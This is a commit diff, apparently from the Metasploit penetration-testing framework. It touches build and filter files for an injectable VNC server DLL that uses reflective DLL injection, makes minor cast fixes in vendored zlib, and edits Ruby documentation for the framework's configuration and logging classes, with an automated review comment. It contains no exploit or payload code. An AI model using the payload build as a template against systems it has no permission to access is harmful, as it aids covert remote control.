<ClInclude Include="zlib\infblock.h" />
<ClInclude Include="zlib\infcodes.h" />
<ClInclude Include="zlib\inffast.h" />
<ClInclude Include="zlib\inffixed.h" />
<ClInclude Include="zlib\inftrees.h" />
<ClInclude Include="zlib\infutil.h" />
<ClInclude Include="zlib\trees.h" />
<ClInclude Include="zlib\zconf.h" />
<ClInclude Include="zlib\zlib.h" />
<ClInclude Include="zlib\zutil.h" />
<ClInclude Include="AdministrationControls.h" />
<ClInclude Include="d3des.h" />
<ClInclude Include="DynamicFn.h" />
<ClInclude Include="FileTransferItemInfo.h" />
<ClInclude Include="IncomingConnectionsControls.h" />
<ClInclude Include="InputHandlingControls.h" />
<ClInclude Include="keysymdef.h" />
<ClInclude Include="MatchWindow.h" />
<ClInclude Include="MinMax.h" />
<ClInclude Include="PollControls.h" />
<ClInclude Include="QuerySettingsControls.h" />
<ClInclude Include="RectList.h" />
<ClInclude Include="resource.h" />
<ClInclude Include="rfb.h" />
<ClInclude Include="rfbproto.h" />
<ClInclude Include="SharedDesktopArea.h" />
<ClInclude Include="stdhdrs.h" />
<ClInclude Include="translate.h" />
<ClInclude Include="TsSessions.h" />
<ClInclude Include="VideoDriver.h" />
<ClInclude Include="vncAbout.h" />
<ClInclude Include="vncauth.h" />
<ClInclude Include="vncBuffer.h" />
<ClInclude Include="vncClient.h" />
<ClInclude Include="vncDesktop.h" />
<ClInclude Include="vncEncodeCoRRE.h" />
<ClInclude Include="vncEncodeHexT.h" />
<ClInclude Include="vncEncoder.h" />
<ClInclude Include="vncEncodeRRE.h" />
<ClInclude Include="vncEncodeTight.h" />
<ClInclude Include="vncEncodeZlib.h" />
<ClInclude Include="vncEncodeZlibHex.h" />
<ClInclude Include="vncInstHandler.h" />
<ClInclude Include="vncKeymap.h" />
<ClInclude Include="vncPasswd.h" />
<ClInclude Include="vncRegion.h" />
<ClInclude Include="vncServer.h" />
<ClInclude Include="vncService.h" />
<ClInclude Include="vncSockConnect.h" />
<ClInclude Include="VSocket.h" />
<ClInclude Include="VTypes.h" />
<ClInclude Include="WallpaperUtils.h" />
</ItemGroup>
<ItemGroup>
<Text Include="README.TXT" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>


@ -0,0 +1,527 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{804c711f-35c6-4aac-9b8a-9cf8b528de85}</UniqueIdentifier>
<Extensions>.cpp, .c</Extensions>
</Filter>
<Filter Include="Source Files\encoder">
<UniqueIdentifier>{7847cf33-fe03-48ad-9a94-a8956821f343}</UniqueIdentifier>
<Extensions>.cpp, .c</Extensions>
</Filter>
<Filter Include="Source Files\omnithread">
<UniqueIdentifier>{a328f948-40d7-4548-9451-66b620124477}</UniqueIdentifier>
</Filter>
<Filter Include="Source Files\libjpeg">
<UniqueIdentifier>{cb642898-1056-43ee-828a-40004b207331}</UniqueIdentifier>
</Filter>
<Filter Include="Source Files\zlib">
<UniqueIdentifier>{22b4b748-5baf-4a41-9ab0-ef1d45f215aa}</UniqueIdentifier>
</Filter>
<Filter Include="Source Files\winvnc">
<UniqueIdentifier>{2a00b2f1-2b80-496f-ade2-3ac76578d435}</UniqueIdentifier>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{c3a89192-29f8-4ebc-b443-1032d86966d6}</UniqueIdentifier>
<Extensions>.h</Extensions>
</Filter>
<Filter Include="Header Files\libjpeg">
<UniqueIdentifier>{a545ae04-19cc-401a-bb0e-fd3d7aad0f60}</UniqueIdentifier>
</Filter>
<Filter Include="Header Files\zlib">
<UniqueIdentifier>{525d33a4-2360-47f9-9e68-24f7d54d50cb}</UniqueIdentifier>
</Filter>
<Filter Include="Header Files\winvnc">
<UniqueIdentifier>{e0e45b7e-7137-4fa7-acb3-9c57acce4c9c}</UniqueIdentifier>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="vncdll.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="vncEncodeCoRRE.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="vncEncodeHexT.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="vncEncoder.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="vncEncodeRRE.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="vncEncodeTight.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="vncEncodeZlib.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="vncEncodeZlibHex.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="omnithread\nt.cpp">
<Filter>Source Files\omnithread</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcapimin.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcapistd.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jccoefct.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jccolor.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcdctmgr.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jchuff.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcinit.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcmainct.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcmarker.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcmaster.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcomapi.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcparam.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcphuff.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcprepct.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcsample.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jctrans.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdapimin.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdapistd.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdatadst.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdatasrc.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdcoefct.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdcolor.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jddctmgr.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdhuff.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdinput.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdmainct.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdmarker.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdmaster.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdmerge.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdphuff.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdpostct.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdsample.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdtrans.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jerror.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jfdctflt.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jfdctfst.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jfdctint.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jidctflt.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jidctfst.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jidctint.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jidctred.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jmemmgr.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jmemnobs.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jquant1.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jquant2.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jutils.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="zlib\adler32.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\compress.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\crc32.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\deflate.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\infblock.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\infcodes.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\inffast.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\inflate.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\inftrees.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\infutil.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\maketree.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\trees.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\uncompr.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\zutil.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="d3des.c">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="DynamicFn.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="FileTransferItemInfo.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="MinMax.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="RectList.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="stdhdrs.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="tableinitcmtemplate.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="tableinittctemplate.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="tabletranstemplate.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="translate.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="TsSessions.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="VideoDriver.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncauth.c">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncBuffer.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncClient.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncDesktop.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncInstHandler.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncKeymap.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncRegion.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncServer.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncService.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncSockConnect.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="VSocket.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="WallpaperUtils.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="omnithread\nt.h">
<Filter>Source Files\omnithread</Filter>
</ClInclude>
<ClInclude Include="omnithread\omnithread.h">
<Filter>Source Files\omnithread</Filter>
</ClInclude>
<ClInclude Include="common.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jchuff.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jconfig.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jdct.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jdhuff.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jerror.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jinclude.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jmemsys.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jmorecfg.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jpegint.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jpeglib.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jversion.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="zlib\deflate.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\infblock.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\infcodes.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\inffast.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\inffixed.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\inftrees.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\infutil.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\trees.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\zconf.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\zlib.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\zutil.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="AdministrationControls.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="d3des.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="DynamicFn.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="FileTransferItemInfo.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="IncomingConnectionsControls.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="InputHandlingControls.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="keysymdef.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="MatchWindow.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="MinMax.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="PollControls.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="QuerySettingsControls.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="RectList.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="resource.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="rfb.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="rfbproto.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="SharedDesktopArea.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="stdhdrs.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="translate.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="TsSessions.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="VideoDriver.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncAbout.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncauth.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncBuffer.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncClient.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncDesktop.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncodeCoRRE.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncodeHexT.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncoder.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncodeRRE.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncodeTight.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncodeZlib.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncodeZlibHex.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncInstHandler.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncKeymap.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncPasswd.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncRegion.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncServer.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncService.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncSockConnect.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="VSocket.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="VTypes.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="WallpaperUtils.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<Text Include="README.TXT">
<Filter>Header Files\winvnc</Filter>
</Text>
</ItemGroup>
</Project>

2
external/source/vncdll/winvnc/vncDesktop.cpp vendored Normal file → Executable file

@ -2906,7 +2906,7 @@ bool bDbgBmDump(
TCHAR szFileName[MAX_PATH];
sprintf(
szFileName,
"%04u.%02u.%02u-%02u-%02u-%02u-0x%08x.bmp",
"%04u.%02u.%02u-%02u-%02u-%02u-0x%08p.bmp",
stm.wYear, stm.wMonth, stm.wDay,
stm.wHour, stm.wMinute, stm.wSecond,
ptr);

2
external/source/vncdll/winvnc/vncdll.cpp vendored Normal file → Executable file

@ -15,7 +15,7 @@
*/
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "ReflectiveLoader.c"
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
HANDLE hMessageMutex = NULL;

2
external/source/vncdll/winvnc/zlib/inffast.c vendored Normal file → Executable file

@ -99,7 +99,7 @@ z_streamp z;
do {
r += s->end - s->window; /* force pointer in window */
} while (r < s->window); /* covers invalid distances */
e = s->end - r;
e = (uInt)(s->end - r);
if (c > e)
{
c -= e; /* wrapped copy */

2
external/source/vncdll/winvnc/zlib/inflate.c vendored Normal file → Executable file

@ -334,7 +334,7 @@ z_streamp z;
}
/* restore */
z->total_in += p - z->next_in;
z->total_in += (uLong)(p - z->next_in);
z->next_in = p;
z->avail_in = n;
z->state->sub.marker = m;

2
external/source/vncdll/winvnc/zlib/infutil.h vendored Normal file → Executable file

@ -64,7 +64,7 @@ struct inflate_blocks_state {
/* defines for inflate input/output */
/* update pointers and return */
#define UPDBITS {s->bitb=b;s->bitk=k;}
#define UPDIN {z->avail_in=n;z->total_in+=p-z->next_in;z->next_in=p;}
#define UPDIN {z->avail_in=n;z->total_in+=(uLong)(p-z->next_in);z->next_in=p;}
#define UPDOUT {s->write=q;}
#define UPDATE {UPDBITS UPDIN UPDOUT}
#define LEAVE {UPDATE return inflate_flush(s,z,r);}


@ -3,22 +3,16 @@ require 'fileutils'
module Msf
###
#
# This class wraps interaction with global configuration that can be used as a
# persistent storage point for configuration, logs, and other such fun things.
#
###
class Config < Hash
#
# The installation root directory for the distribution
#
# The installation's root directory for the distribution
InstallRoot = File.expand_path(File.join(File.dirname(__FILE__), '..', '..', '..'))
#
# Determines the base configuration directory.
#
# @return [String] the base configuration directory
def self.get_config_root
# Use MSFCFGDIR environment variable first. See feature request #5797
@ -47,7 +41,11 @@ class Config < Hash
#
# Default values
#
# Default system file separator.
FileSep = File::SEPARATOR
# Default configuration locations.
Defaults =
{
'ConfigDirectory' => get_config_root,
@ -68,247 +66,260 @@ class Config < Hash
#
##
#
# Returns the framework installation root.
#
# @return [String] the framework installation root {InstallRoot}.
def self.install_root
InstallRoot
end
# Returns the configuration directory default.
#
# Calls the instance method.
#
# @return [String] the root configuration directory.
def self.config_directory
self.new.config_directory
end
# Returns the global module directory.
#
# Calls the instance method.
#
# @return [String] path to global module directory.
def self.module_directory
self.new.module_directory
end
# Returns the path that scripts can be loaded from.
#
# Calls the instance method.
#
# @return [String] path to script directory.
def self.script_directory
self.new.script_directory
end
# Returns the directory that log files should be stored in.
#
# Calls the instance method.
#
# @return [String] path to log directory.
def self.log_directory
self.new.log_directory
end
# Returns the directory that plugins are stored in.
#
# Calls the instance method.
#
# @return [String] path to plugin directory.
def self.plugin_directory
self.new.plugin_directory
end
# Returns the user-specific plugin base path
#
# Calls the instance method.
#
# @return [String] path to user-specific plugin directory.
def self.user_plugin_directory
self.new.user_plugin_directory
end
# Returns the directory in which session log files are to reside.
#
# Calls the instance method.
#
# @return [String] path to session log directory.
def self.session_log_directory
self.new.session_log_directory
end
# Returns the directory in which captured data will reside.
#
# Calls the instance method.
#
# @return [String] path to loot directory.
def self.loot_directory
self.new.loot_directory
end
# Returns the directory in which locally-generated data will reside.
#
# Calls the instance method.
#
# @return [String] path to locally-generated data directory.
def self.local_directory
self.new.local_directory
end
# Returns the user-specific module base path
#
# Calls the instance method.
#
# @return [String] path to user-specific modules directory.
def self.user_module_directory
self.new.user_module_directory
end
# Returns the user-specific script base path
#
# Calls the instance method.
#
# @return [String] path to user-specific script directory.
def self.user_script_directory
self.new.user_script_directory
end
# Returns the data directory
#
# Calls the instance method.
#
# @return [String] path to data directory.
def self.data_directory
self.new.data_directory
end
# Returns the full path to the configuration file.
#
# Calls the instance method.
#
# @return [String] path to the configuration file.
def self.config_file
self.new.config_file
end
# Returns the full path to the history file.
#
# Calls the instance method.
#
# @return [String] path the history file.
def self.history_file
self.new.history_file
end
# Initializes configuration, creating directories as necessary.
#
# Calls the instance method.
#
# @return [void]
def self.init
self.new.init
end
# Loads configuration from the supplied file path, or the default one if
# none is specified.
#
# Calls the instance method.
#
# @param path [String] the path to the configuration file.
# @return [Rex::Parser::Ini] INI file parser.
def self.load(path = nil)
self.new.load(path)
end
# Saves configuration to the path specified in the ConfigFile hash key or
# the default path if one isn't specified. The options should be group
# references that have named value pairs.
#
# Calls the instance method.
#
# @param opts [Hash] Hash containing configuration options.
# @option opts 'ConfigFile' [Hash] configuration file these options apply
# to.
# @return [void]
# @example Save 'Cat' => 'Foo' in group 'ExampleGroup'
# save(
# 'ExampleGroup' =>
# {
# 'Foo' => 'Cat'
# })
def self.save(opts)
self.new.save(opts)
end
#
# Updates the config class' self with the default hash.
#
# @return [Hash] the updated Hash.
def initialize
update(Defaults)
end
#
# Returns the installation root directory
#
# @return [String] the installation root directory {InstallRoot}.
def install_root
InstallRoot
end
#
# Returns the configuration directory default.
#
# @return [String] the root configuration directory.
def config_directory
self['ConfigDirectory']
end
#
# Returns the full path to the configuration file.
#
# @return [String] path to the configuration file.
def config_file
config_directory + FileSep + self['ConfigFile']
end
# Returns the full path to the history file.
#
# Returns the full path to the configuration file.
#
# @return [String] path the history file.
def history_file
config_directory + FileSep + "history"
end
#
# Returns the global module directory.
#
# @return [String] path to global module directory.
def module_directory
install_root + FileSep + self['ModuleDirectory']
end
#
# Returns the path that scripts can be loaded from.
#
# @return [String] path to script directory.
def script_directory
install_root + FileSep + self['ScriptDirectory']
end
#
# Returns the directory that log files should be stored in.
#
# @return [String] path to log directory.
def log_directory
config_directory + FileSep + self['LogDirectory']
end
#
# Returns the directory that plugins are stored in.
#
# @return [String] path to plugin directory.
def plugin_directory
install_root + FileSep + self['PluginDirectory']
end
#
# Returns the directory in which session log files are to reside.
#
# @return [String] path to session log directory.
def session_log_directory
config_directory + FileSep + self['SessionLogDirectory']
end
#
# Returns the directory in which captured data will reside.
#
# @return [String] path to loot directory.
def loot_directory
config_directory + FileSep + self['LootDirectory']
end
#
# Returns the directory in which locally-generated data will reside.
#
# @return [String] path to locally-generated data directory.
def local_directory
config_directory + FileSep + self['LocalDirectory']
end
#
# Returns the user-specific module base path
#
# @return [String] path to user-specific modules directory.
def user_module_directory
config_directory + FileSep + "modules"
end
#
# Returns the user-specific plugin base path
#
# @return [String] path to user-specific plugin directory.
def user_plugin_directory
config_directory + FileSep + "plugins"
end
#
# Returns the user-specific script base path
#
# @return [String] path to user-specific script directory.
def user_script_directory
config_directory + FileSep + "scripts"
end
#
# Returns the data directory
#
# @return [String] path to data directory.
def data_directory
install_root + FileSep + self['DataDirectory']
end
#
# Initializes configuration, creating directories as necessary.
#
# @return [void]
def init
FileUtils.mkdir_p(module_directory)
FileUtils.mkdir_p(config_directory)
@ -320,27 +331,31 @@ class Config < Hash
FileUtils.mkdir_p(user_plugin_directory)
end
#
# Loads configuration from the supplied file path, or the default one if
# none is specified.
#
# @param path [String] the path to the configuration file.
# @return [Rex::Parser::Ini] INI file parser.
def load(path = nil)
path = config_file if (!path)
return Rex::Parser::Ini.new(path)
end
#
# Saves configuration to the path specified in the ConfigFile hash key or
# the default path is one isn't specified. The options should be group
# references that have named value pairs. Example:
#
# save(
# 'ExampleGroup' =>
# {
# 'Foo' => 'Cat'
# })
# the default path if one isn't specified. The options should be group
# references that have named value pairs.
#
# @param opts [Hash] Hash containing configuration options.
# @option opts 'ConfigFile' [Hash] configuration file these options apply
# to.
# @return [void]
# @example Save 'Cat' => 'Foo' in group 'ExampleGroup'
# save(
# 'ExampleGroup' =>
# {
# 'Foo' => 'Cat'
# })
def save(opts)
ini = Rex::Parser::Ini.new(opts['ConfigFile'] || config_file)
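Review bot: The new YARD tag on `get_config_root` in the first hunk (`@return [String] the base configuration directory`) omits how the directory is chosen, even though the body's first line shows it is taken from the `MSFCFGDIR` environment variable; since the config-relative paths in this class (config file, history file, loot and session-log directories) are all derived from it via `self['ConfigDirectory']`, the override deserves a line such as `# Honours the MSFCFGDIR environment variable before falling back to the default location; see feature request #5797.` The body of `get_config_root` continues outside the hunk, so the fallback itself is not visible here. Separately, the `@return [Hash] the updated Hash.` tag on `initialize` in the third hunk documents a value callers never see, because `Config.new` returns the instance rather than what `initialize` returns; `@return [void]` or dropping the tag would be accurate. The `@return` lines for both `history_file` methods read `path the history file` and are presumably missing a `to`.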


@ -4,19 +4,19 @@ require 'msf/base'
module Msf
###
#
# This module provides an initialization interface for logging.
#
###
class Logging
#Is logging initialized
#@private
@@initialized = false
#Is session logging enabled
#@private
@@session_logging = false
#
# Initialize logging.
#
# @return [void]
def self.init
if (! @@initialized)
@@initialized = true
@ -35,9 +35,13 @@ class Logging
end
end
# Enables a log source of name src. Creates the .log file in the
# configured directory if logging is not already enabled for this
# source.
#
# Enables a log source.
#
# @param src [String] log source name.
# @param level [Integer] logging level.
# @return [void]
def self.enable_log_source(src, level = 0)
if (log_source_registered?(src) == false)
f = Rex::Logging::Sinks::Flatfile.new(
@ -47,30 +51,33 @@ class Logging
end
end
#
# Stops logging for a given log source.
#
# @param src [String] the log source to disable.
# @return [Boolean] true if successful. false if not.
def self.disable_log_source(src)
deregister_log_source(src)
end
#
